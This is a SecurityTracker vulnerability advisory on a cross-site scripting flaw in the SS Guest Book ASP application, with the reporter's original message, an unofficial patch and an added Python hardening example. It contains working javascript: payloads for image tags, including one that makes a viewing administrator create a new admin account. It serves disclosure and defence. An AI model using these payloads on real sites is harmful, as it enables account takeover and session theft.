SecurityTracker.com

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   SS Guest Book
Vendors:   Bankert, Terry
SS Guest Book Input Validation Flaw in Image Tags Allows Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1005386
SecurityTracker URL:  http://securitytracker.com/id/1005386
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 8 2002
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1
Description:   An input validation vulnerability was reported in the SS Guest Book from 'Script-Shed.com'. A remote user can conduct cross-site scripting attacks to gain access to the guest book application.

It is reported that config.asp does not filter user-supplied HTML tags from '[img]' image tags. A remote user can submit a guest book comment that contains HTML. Then, when a target user views the guest book entry, arbitrary scripting code will be executed by the target user's browser. The code will originate from the site running SS Guest Book and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit example is provided:

[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]

If a target user with administrative privileges views a message containing the above listed exploit string, the specified user account (Pom) will be created with the specified password (turlututu).

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running SS Guest Book, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. If the target user is an administrator, the remote user can cause the target user to add a specified account to the system with a specified password.
Solution:   No solution was available at the time of this entry.

The author of the report has provided the following unofficial patch:

In config.asp :
Add this line :

strOutput = Replace(strOutput, chr(34), "&quot;")

after

----------------------------------------------
strOutput = Replace(strOutput, "<", "&lt;")
strOutput = Replace(strOutput, ">", "&gt;")
----------------------------------------------

And replace these lines :


------------------------------------------------
fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>")
fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>")
fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>")
fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>")
------------------------------------------------


by :

------------------------------------------------
fString = doCode(fString, "[img]http://","[/img]","<img src=""http://",""" border=0>")
fString = doCode(fString, "[image]http://","[/image]","<img src=""http://",""" border=0>")
fString = doCode(fString, "[img=right]http://","[/img=right]","<img align=right src=""http://",""" id=right border=0>")
fString = doCode(fString, "[image=right]http://","[/image=right]","<img align=right src=""http://",""" id=right border=0>")
fString = doCode(fString, "[img=left]http://","[/img=left]","<img align=left src=""http://",""" id=left border=0>")
fString = doCode(fString, "[image=left]http://","[/image=left]","<img align=left src=""http://",""" id=left border=0>")
------------------------------------------------
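
The two parts of the unofficial patch above (escaping the double quote and restricting the image URL), as an added Python example that is not part of the advisory or of SS Guest Book's code. `render_unpatched` and `render_hardened` are hypothetical stand-ins for the doCode() calls in config.asp, the sample inputs in the comments are constructed, and the hardened version goes beyond the patch by parsing the URL and also accepting https.

```python
import html
import re
from urllib.parse import urlsplit

# Matches the six tag spellings listed for config.asp: [img], [image] and =left/=right.
TAG = re.compile(r"\[(img|image)(?:=(left|right))?\](.*?)\[/\1(?(2)=\2)\]",
                 re.IGNORECASE | re.DOTALL)

def img_html(src, align):
    # Same markup shape as the doCode() replacement strings quoted on the page.
    if align:
        a = align.lower()
        return f'<img align={a} src="{src}" id={a} border=0>'
    return f'<img src="{src}" border=0>'

def render_unpatched(text):
    # Behaviour the advisory describes: only < and > are escaped, any URL is accepted.
    out = text.replace("<", "&lt;").replace(">", "&gt;")
    return TAG.sub(lambda m: img_html(m.group(3), m.group(2)), out)

def url_allowed(url):
    # Allowlist by parsed scheme; urlsplit lowercases the scheme for us.
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and bool(parts.netloc)

def render_hardened(text):
    out, pos = [], 0
    for m in TAG.finditer(text):
        out.append(html.escape(text[pos:m.start()]))   # escape text between tags
        url = m.group(3).strip()
        if url_allowed(url):
            # quote=True turns " into &quot;, so the URL cannot close the src attribute.
            out.append(img_html(html.escape(url, quote=True), m.group(2)))
        else:
            out.append(html.escape(m.group(0)))        # rejected tag shown as plain text
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)

# Constructed inputs: the advisory's placeholder form and a quote-breakout URL.
# render_unpatched('[image]javascript:{SCRIPT}[/image]') emits an <img> with that src;
# render_hardened() leaves the same tag as inert text.
```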

Vendor URL:  www.script-shed.com/ssgbook/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  SSGbook (ASP)


Information :
Product : SSGbook
Language : ASP
Tested version : 1
Website : http://www.script-shed.com
Problem : Cross Site Scripting

PHP Code / location :
----------------- config.asp ----------------------
fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>")
fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>")
fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>")
fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>")
----------------- config.asp ----------------------

Exploit :
[image]javascript:{SCRIPT}[/image]
[img=right]javascript:{SCRIPT}[/img=right]
[image=right]javascript:{SCRIPT}[/image=right]
[img=left]javascript:{SCRIPT}[/img=left]
[image=left]javascript:{SCRIPT}[/image=left]
[img]javascript:{SCRIPT}[/img]


e.g. :
[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]

Adds an admin if an admin reads it. Login : Pom, Password : turlututu

Patch :
In config.asp :
Add this line :

  strOutput = Replace(strOutput, chr(34), "&quot;")

after

----------------------------------------------
  strOutput = Replace(strOutput, "<", "&lt;")
  strOutput = Replace(strOutput, ">", "&gt;")
----------------------------------------------

And replace these lines :


------------------------------------------------
	fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
	fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
	fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>")
	fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>")
	fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>")
	fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>")
------------------------------------------------


by :

------------------------------------------------
	fString = doCode(fString, "[img]http://","[/img]","<img src=""http://",""" border=0>")
	fString = doCode(fString, "[image]http://","[/image]","<img src=""http://",""" border=0>")
	fString = doCode(fString, "[img=right]http://","[/img=right]","<img align=right src=""http://",""" id=right border=0>")
	fString = doCode(fString, "[image=right]http://","[/image=right]","<img align=right src=""http://",""" id=right border=0>")
	fString = doCode(fString, "[img=left]http://","[/img=left]","<img align=left src=""http://",""" id=left border=0>")
	fString = doCode(fString, "[image=left]http://","[/image=left]","<img align=left src=""http://",""" id=left border=0>")
------------------------------------------------




More details in French :
http://www.frog-man.org/tutos/SSGbook.txt

translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSSGbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n



 
 



Copyright 2019, SecurityGlobal.net LLC